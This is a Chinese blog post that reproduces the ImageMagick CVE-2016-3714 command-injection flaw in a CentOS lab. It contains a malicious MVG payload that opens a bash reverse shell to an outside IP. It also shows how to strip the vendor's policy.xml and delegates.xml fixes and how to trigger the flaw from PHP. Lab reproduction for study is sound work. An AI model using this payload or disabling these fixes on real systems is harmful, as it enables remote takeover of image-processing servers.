ImageMagick 漏洞复现之路

最新推荐文章于 2024-04-18 18:52:53 发布
最新推荐文章于 2024-04-18 18:52:53 发布
阅读量3.7k 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/52385272
版权
我的环境是centos7 ,php是PHP 5.4.16,ImageMagick是6.7.8-9正好在影响范围之内,但是官方还是对其官网上所有的安装包进行了修复,所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的,
我们看看官方都是怎么修复的,并且还原漏洞现场
漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2016-3714%20-%20ImageMagick%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90.html

首先安装ImageMagick:
参考:http://jingyan.baidu.com/article/91f5db1be6ded11c7f05e3d3.html
yum install ImageMagick
yum install ImageMagick-devel
yum install php-pear
yum -y install php-devel
yum install gcc
pecl install imagick (这个之内在php 5.3的版本以上才能安装成功)
 echo extension=imagick.so >> /etc/php.ini  (这个是将ImageMagick加载到php中)
这个时候我们vim test.mvg

内容是:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context

保存,然后

converttest.mvg test.png

发现没有权限

我查看:

/etc/ImageMagick/policy.xml

发现在配置文件里面已经加入了修复配置:

<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>

我删掉这些

然后再运行一下,依然不成功,我继续查看:/etc/ImageMagick/delegates.xml

查找https

发现:

修复前配置文件的https部分:

<delegatedecode="https" command="&quot;curl&quot; -s -k-o &quot;%o&quot; &quot;https:%M&quot;"/>

修复后:

<delegatedecode="https" command="&quot;curl&quot; -s -k-o &quot;%o&quot; &quot;https:%F&quot;"/>

红色部分就是官方修复的位置

将配置文件修改之后:

converttest.mvg test.png

成功出发漏洞,反弹一个shell回本机



写一个php文件来证明这个漏洞:

<?php
$thu= new Imagick();
$thu->readImage('test.mvg');
$thu->writeImage('KKKK.png');
$thu->clear();
$thu->destroy();
unlink("KKKK.png");
?>

phptest.php 来执行一下

成功触发,并且反弹



niexinming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ImageMagick远程代码执行漏洞分析
fly小灰灰的专栏
08-12 7743
1. 漏洞描述 漏洞编号: CVE-2016-3714 发现人员: Slack安全工程师Ryan Hube 漏洞简述: 产生原因是因为字符过滤不严谨所导致的执行代码. 对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。 影响版本: ImageMagick6.5.7-8 2012-08-17 ImageMagick6.7.7-10 2014-03-06 低版本至6.9
ImageMagick 命令执行漏洞
kuiguowei的博客
01-16 2739
docker Docker是由一家叫做Dotcloud的公司出品。 Docker是一个由GO语言写的程序运行的容器; 目前云服务的基石是操作系统级别的隔离,在同一台物理服务器上虚拟出多个主机。Docker则实现了一种应用程序级别的隔离; 它改变我们基本的开发、操作单元,由直接操作虚拟主机(VM),转换到操作程序运行的“容器”上来。 它也是一个开源的应用容器引擎,让开发者可以打包他们的应用以及
WP_Image_Editor_Imagick 漏洞临时解决方法_打开 imagemagick 的配置文件 policy(1)
最新发布
2401_83974412的博客
04-18 567
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。
ImageMagick爆高危命令执行漏洞
热门推荐
煜铭2011
05-09 1万+
0x01 前言 ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。众多的网站平台都是用他渲染处理图片。可惜在3号时被公开了一些列漏洞,其中一个漏洞可导致远程执行代码(RCE),如果你处理用户提交的图片。该漏洞是针对在野外使用此漏洞。许多图...
php imagemagick 漏洞,Linux下ImageMagick远程代码执行漏洞修复 | 系统运维
weixin_33539366的博客
03-10 195
二、安装ImageMagick系统运维 www.osyunwei.com 温馨提醒:qihang01原创内容版权所有,转载请注明出处及原文链接cd /usr/local/src #进入软件包存放目录tar zxvf ImageMagick-7.0.1-1.tar.gz #解压cd ImageMagick-7.0.1-1 #进入安装目录./configure --prefix=/usr/local/...
php-imagick漏洞,PHP Imagick内存泄漏
weixin_35970228的博客
03-12 428
imagick使用共享库,它的内存使用对于PHP来说是遥不可及的,因此调整PHP内存和垃圾收集无济于事.我自己也有同样的问题,试图用50(!)页3000×2000像素来处理多页tiff图像.解决方案是让想象力将其像素缓存放在磁盘上.在创建Imagick对象之前添加它解决了我的问题:// pixel cache max sizeIMagick::setResourceLimit(imagick::R...
深入浅析ImageMagick命令执行漏洞
12-23
00 前言 什么是ImageMagickImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理...01 漏洞描述 ImageMagick是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PH
ImageMagick
04-18
非常强大的工具
ImageMagick7.0.8 win64 16安装包下载。使用moviepy抛ImageMagick异常问题解决
06-17
ImageMagick-7.0.8-56-Q16-x64-dll.rar是ImageMagick7.0.8的windows 64位操作系统的安装程序,解压执行即可安装。 使用ImageMagick的创建,编辑,撰写,或转换位图图像。它可以读取和写入各种格式(超过200种)的...
vulhub漏洞复现27_Imagemagick
weixin_44193247的博客
02-02 888
vulhub漏洞复现练习篇
ImageMagick-6.7.9.9
05-04
ImageMagick是一个免费的创建、编辑、合成图片的软件。它可以读取、转换、写入多种格式的图片。图片切割、颜色替换、各种效果的应用,图片的旋转、组合,文本,直线,多边形,椭圆,曲线,附加到图片伸展旋转。ImageMagick是免费软件:全部源码开放,可以自由使用,复制,修改,发布,它遵守GPL许可协议,可以运行于大多数的操作系统,ImageMagick的大多数功能的使用都来源于命令行工具。
php imagemagick 漏洞,ImageMagick命令执行漏洞分析
weixin_39992483的博客
03-10 477
关于ImageMagickImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理...
Centos5.8 安装 ImageMagick 6.8.9-3
weixin_33724570的博客
06-22 155
下载最新的 ImageMagick-6.8.9-3.x86_64.rpm 直接prm -ivh 安装提示错误 error: Failed dependencies: libHalf.so.4()(64bit) is needed by ImageMagick-6.8.0-4.x86_64 libIex.so.4()(64bit) is needed by ImageMagick-6...
rsync未授权漏洞复现
weixin_45006525的博客
03-31 5741
漏洞简介: rsync是linux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他ssh、rsync主机同步。该协议默认监听873端口,如果目标开启rsync,并且没有配置ACL或访问密码,就可以未授权读写目标服务器文件。 环境搭建: 本此环境使用docker-vulhub 进入vulhub-rsync,运行docker-compose up -d 环境搭建完成后,用nmap扫描一下,发现服务已经启动 漏洞复现 1.列出模块下的文件 2.下载任意文件 rsync r
ImageMagick任意文件读取漏洞(CVE-2022-44268)
god_Zeo的安全博客
02-12 3602
爆出一个 ImageMagick 漏洞 CVE-2022-44268 ,在ImageMagick 7.1.0-51版本及以前 ,可以造成一个任意文件读取的危害比较可观,最近有时间来复现学习一下
漏洞复现-rsync-未授权访问】vulfocus/rsync-common
10-16 1243
【rsync-未授权访问】

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值